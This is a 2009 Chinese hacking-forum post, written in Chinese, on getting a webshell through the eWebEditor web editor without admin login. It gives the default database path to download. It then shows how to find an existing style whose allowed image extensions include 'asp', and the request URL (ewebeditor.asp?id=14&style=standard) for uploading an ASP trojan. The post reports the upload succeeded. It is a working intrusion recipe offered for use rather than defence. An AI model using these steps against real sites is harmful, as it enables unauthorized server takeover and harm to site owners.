|
 
- 帖子
- 131
- 积分
- 1083
- 威望
- 358
- 金钱
- 2450
- 在线时间
- 414 小时
|
[分享] ewebeditor不登陆也获得webshel
ewebeditor入侵的时候一般是进了后台增加ASP,接着上传ASP木马就获得webshell了。
但有时候无法进后台,情况是这样,下载了数据库但是管理员md5无法破解,无法进入后台,可以利用数据库信息查找别人增加过的 asp
然后我们利用即可获得webshell
默认数据库:db/ewebeditor.mdb 下载数据库到本地
ewebeditor_style
S_ImageExt 图片,可以发现有一个存在asp
gif|jpg|jpeg|bmp|asp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
ewebeditor.asp?id=s_id&style=s_name
有asp的s_id是14
s_name看看是什么,是standard
ewebeditor.asp?id=14&style=standard 修改下
上传试下
成功获得webshell |
|
发表于 2009-7-12 15:38
| 